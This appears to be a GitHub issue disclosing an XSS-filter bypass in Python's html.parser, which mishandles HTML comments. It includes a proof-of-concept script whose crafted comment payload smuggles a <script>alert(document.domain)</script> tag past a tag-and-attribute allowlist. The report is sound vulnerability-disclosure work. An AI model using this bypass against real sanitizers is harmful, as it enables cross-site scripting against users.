Open
Description
Description
The library html.parser
allows an attacker to bypass any whitelist of HTML tags and attributes that seek to mitigate XSS. This is possible because the application does not correctly parse the HTML comments in the user input.
Vulnerability
This vulnerability occurs because the application does not correctly parse the HTML comments in the user input.
Exploitation
In this scenario a developer parses the HTML entered by the user to validate it with an allowlist of tags and attributes. This is to prevent XSS attacks. In this case we see how we can bypass a security check of this type, thanks to the fact that the parser does not parse the HTML comments properly.
poc.py
from html.parser import HTMLParser
from html.entities import name2codepoint
class MyHTMLParser(HTMLParser):
def handle_starttag(self, tag, attrs):
print("Start tag:", tag)
# Whitelist Tags
print("Invalid tag:",tag != "h1")
for attr in attrs:
# Whitelist Attr
print("attr:", attr)
print("Invalid attr:",attr != "alt")
def handle_endtag(self, tag):
print("End tag :", tag)
def handle_data(self, data):
print("Data :", data)
def handle_comment(self, data):
print("Comment :", data)
def handle_entityref(self, name):
c = chr(name2codepoint[name])
print("Named ent:", c)
def handle_charref(self, name):
if name.startswith('x'):
c = chr(int(name[1:], 16))
else:
c = chr(int(name))
print("Num ent :", c)
def handle_decl(self, data):
print("Decl :", data)
parser = MyHTMLParser()
parser.feed('<!--!> <h1 value="--!><script>alert(document.domain)</script>')
# HTML is safe, we can proceed
Evidence of exploitation
Expected behavior
System Information
- CPython versions tested on: Python 3.10.8
- Operating system and architecture: GNU/Linux x86_64
Linked PRs
Metadata
Metadata
Assignees
Projects
Status
Todo